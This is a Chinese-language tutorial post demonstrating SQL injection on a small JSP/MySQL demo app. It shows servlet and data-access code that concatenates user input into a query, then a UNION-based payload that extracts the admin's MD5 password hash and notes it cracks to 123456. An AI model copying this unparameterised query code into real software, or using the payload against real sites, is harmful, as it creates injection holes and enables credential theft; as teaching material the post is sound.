jsp mysql 注入攻擊例項
阿新 • • 發佈:2019-01-26
例子 要查詢資訊 並顯示出來
SQL 資訊表與admin表 插入資訊 md5 加密的密碼
CREATE TABLE `admin` ( `Id` int(11) NOT NULL AUTO_INCREMENT, `Name` varchar(40) NOT NULL, `Psw` varchar(100) NOT NULL, PRIMARY KEY (`Id`) )ENGINE=InnoDB DEFAULT CHARSET=utf8; CREATE TABLE `info` ( `Id` int(11) NOT NULL AUTO_INCREMENT, `Info` varchar(40) NOT NULL, PRIMARY KEY (`Id`) )ENGINE=InnoDB DEFAULT CHARSET=utf8; insert into info(`Info`) values('SQLinject'); insert into admin(`Name`,`Psw`) values('admin','E10ADC3949BA59ABBE56E057F20F883E');
開始頁---點選傳參 --查詢資訊
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <% String path = request.getContextPath(); String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; %> <!DOCTYPE HTML> <html> <head> <base href="<%=basePath%>"> <title>SQL注入測試</title> </head> <body> <% String info="SQLinject"; %> <a href="Info?info=<%=info%>"> 查詢info的資訊 </a> </body> </html>
查詢servlet
查詢DALpackage servlet; import javax.servlet.http.HttpServlet; import java.io.IOException; import javax.servlet.RequestDispatcher; import javax.servlet.ServletException; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import dal.infodal; import java.sql.*; public class info extends HttpServlet{ String ms=""; @Override protected void service(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { //取得表單資料 String info=""; if(req.getParameter("info")!=""&&req.getParameter("info").length()<100) { info=new String(req.getParameter("info").getBytes("ISO-8859-1"),"UTF-8"); }else{ ms+="info不正確"; } ResultSet rs=infodal.serchinfo(info); ms="資訊查詢成功"; req.setAttribute("rs", rs); req.setAttribute("ms", ms); RequestDispatcher rd=req.getRequestDispatcher("inforesult.jsp"); rd.forward(req,res); } }
package dal;
import java.sql.*;
import constant.dbconstant;
public class infodal {
public static ResultSet serchinfo(String info){
String driverClass=dbconstant.getDriverclass();
String url=dbconstant.getUrl();
String dbUser = dbconstant.getDbuser();
String dbPwd = dbconstant.getDbpwd();
try{
Class.forName(driverClass);
Connection con = DriverManager.getConnection(url,dbUser,dbPwd);
Statement stmt=con.createStatement();
//
String sql="select id,Info from info where Info='"+info+"'";
ResultSet rs=stmt.executeQuery(sql);
return rs;
}catch(Exception ex)
{
System.out.print("連線失敗!!<br>"+ex.toString());
return null;
}
}
}
顯示查詢資訊
<%@ page language="java"
import="java.util.*"
import="java.sql.*"
import="constant.dbconstant"
pageEncoding="UTF-8"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
<!DOCTYPE HTML>
<html>
<head>
<base href="<%=basePath%>">
<title>SQL注入測試</title>
</head>
<body>
<%
ResultSet rs=(ResultSet)request.getAttribute("rs");
while(rs.next())
{
%>
<p> 查詢的資訊為: <%=rs.getInt("Id") %> </p> <br>
<p> 查詢的資訊為: <%=rs.getString("Info") %> </p> <br>
<p> 查詢的資訊為: <%=rs.getNString(2) %> </p> <br>
<%}%>
<%
String msg="";
msg=(String)request.getAttribute("ms");
if(msg==null){
msg="";
}else{
request.removeAttribute("ms");
}
%>
<%=msg %>
<script type="text/javascript">
window.onload=function(){
if("<%=msg%>"!="")
{
alert("<%=msg%>");
//self.location="inforesult.jsp";
}
}
</script>
</body>
</html>
web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app>
<servlet>
<servlet-name>Info</servlet-name>
<servlet-class>servlet.info</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>Info</servlet-name>
<url-pattern>/Info</url-pattern>
</servlet-mapping>
</web-app>
以上為很常見的jsp過程 引數info 沒有過濾 也沒有引數化查詢
注入語句
SQLinject' union select 2,Psw from admin where Name='admin
2 為常數 因為要對齊info 個數為2 int stirng
查詢語句為
select Id,Info from Info where Info='SQLinject' union select 2,Psw from admin where Name='admin';
查詢出來的資訊為
info 的 Id Info 1 'SQLinject'
2 Psw 2 'E10ADC3949BA59ABBE56E057F20F883E'
E10ADC3949BA59ABBE56E057F20F883E 為md5密碼 線上查詢 123456